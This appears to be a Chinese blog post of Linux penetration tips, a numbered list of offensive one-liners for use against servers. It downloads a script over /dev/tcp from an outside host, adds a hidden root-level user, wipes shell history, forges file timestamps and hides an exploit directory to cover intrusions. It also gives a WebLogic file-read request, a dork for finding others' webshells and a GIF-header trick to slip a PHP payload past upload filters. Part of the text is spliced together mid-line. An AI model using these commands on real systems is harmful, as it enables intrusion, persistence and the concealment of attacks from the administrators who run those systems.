linux常用渗透小技巧
2019年08月09日
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl 2.Linux添加uid为0的用户 useradd -o -u 0 cnbird 3.bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null 4.SSH反向链接 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口,然后服务器上执行ssh localhost -p 44即可 5.weblogic本地读取文件漏洞 curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml” http://server/wl_management_internal2/wl_management 6.apache查看虚拟web目录 ./httpd -t -D DUMP_VHOSTS 7.cvs渗透技巧 CVSROOT/passwd UNIX SHA1的密码文件 CVSROOT/readers CVSROOT/writers CVS/Root CVS/Entries 更新的文件和目录内容 CVS/Repository 8.Cpanel路径泄露 /3rdparty/squirrelmail/functions/plugin.php 9.修改上传文件时间戳(掩盖入侵痕迹) touch -r 老文件时间戳 新文件时间戳 10.利用baidu和google搜索目标主机webshell intitle:PHPJackal 1t1t 11.包总补充 创建临时“隐藏”目录 mkdir /tmp/…/tmp/…目录在管理员有宿醉的情况下是“隐藏”的,可以临时放点exp啥的 12.利用linux输出绕过gif限制的图片 printf “GIF89a\x01\x00\x01\x00” > poc.phpWeblogin Script Tool(WLST) 写入到\\config\\config.xml
\wlserver_10.0\server\bin\setWLSenv.sh 2.启动WLST java weblogic.WLST wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′) wls:/bbk/serverConfig> help() wls:/bbk/serverConfig> edit() wls:/bbk/serverConfig> cd(‘Servers’) wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’) wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’) wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit() wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ‘4′) wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save() wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect() wls:/offline> exit() 3.批处理 保存以上命令为cnbird.py connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′) cd(‘Servers’) cd(‘Log’) cd(‘Server-cnbird’) startEdit() set(‘FileCount’, ‘4′) save() 然后执行 java weblogic.WLST cnbird.py |
参考链接:https://bbs.silic.wiki/misc.php?mod=tag&id=0136
分类:技术文章 | 标签: linux渗透 | 查看:1164